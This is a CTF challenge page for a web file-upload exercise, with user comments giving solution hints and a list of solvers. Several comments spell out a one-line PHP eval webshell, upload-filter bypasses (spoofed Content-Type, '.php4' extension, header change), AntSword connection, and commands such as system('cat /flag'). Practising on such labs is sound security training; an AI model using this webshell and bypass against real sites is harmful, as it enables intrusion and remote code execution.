文件上传WEB 未解决

分数: 35 金币: 4
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 4017
提  示:
描  述:
文件上传
评论
suxiansheng 5天前

https://blog.csdn.net/wangsu327/article/details/161358987?spm=1011.2124.3001.6209

回复 1

fyjfjk 6天前

回复 1

爱喝畅汁 2月前

随便一张图片,用记事本打开写入一句话木马,上传之后点击提交时抓包,抓包之后修改三处:1.Content-Type 修改为:image/jpeg 2.文件名后缀修改为:php4 3.head头修改为Multipart/form-data,放行之后图片就成功上传了,再使用蚁剑进行连接即可

回复 0

是小白鸭 2月前

方法分享:1.php内容:<?php eval($_REQUEST[cmd]);?>。2.绕过。3.运行php寻找flag位置,url?cmd=print_r(scandir['.']); 。4.发现flag文件,url?cmd=echo file_get_contents('../../../../flag'); 。初学者的一点小分享:)

回复 0

李逍遥逛霍格沃茨 4月前

能不能退金币 真被恶心到了

回复 0

李逍遥逛霍格沃茨 4月前

纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空

回复 0

李逍遥逛霍格沃茨 4月前

纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空

回复 0

yuxuanlve 4月前

为什么蚁剑死活连不上啊,改该的都改了啊,哥斯拉也连不上,评论全都看了一遍也没找到解决方案😭

回复 0

ctfcaiji9527 4月前

发现个问题,用yakit死活传不上去,用BP就行。( ╯□╰ )

回复 0

jetxi 7月前

php4和类型修改就可以绕过,可以放命令执行,或者直接蚁剑连,flag在根目录 data={'pass':"system('cat /flag');"}

回复 0

WriteUp

image
harry

4 金币

评分(22)

解题动态

mybugku26 攻破了该题 8小时前
gdrhdr 攻破了该题 11小时前
hulihaha 攻破了该题 13小时前
不想吃肥肉 攻破了该题 1天前
晚霞难掩秋色 攻破了该题 2天前
46963009 攻破了该题 2天前
proapolly 攻破了该题 2天前
HaiDai 攻破了该题 3天前
alden 攻破了该题 3天前
suxiansheng 攻破了该题 5天前
yehlg 攻破了该题 6天前
o_0 攻破了该题 6天前
alonely 攻破了该题 7天前
1855 攻破了该题 8天前
yang0000 攻破了该题 8天前
我不打游戏的 攻破了该题 8天前
蒙仙 攻破了该题 8天前
千洛十安 攻破了该题 9天前
wugan 攻破了该题 9天前
都市一星 攻破了该题 9天前
问题反馈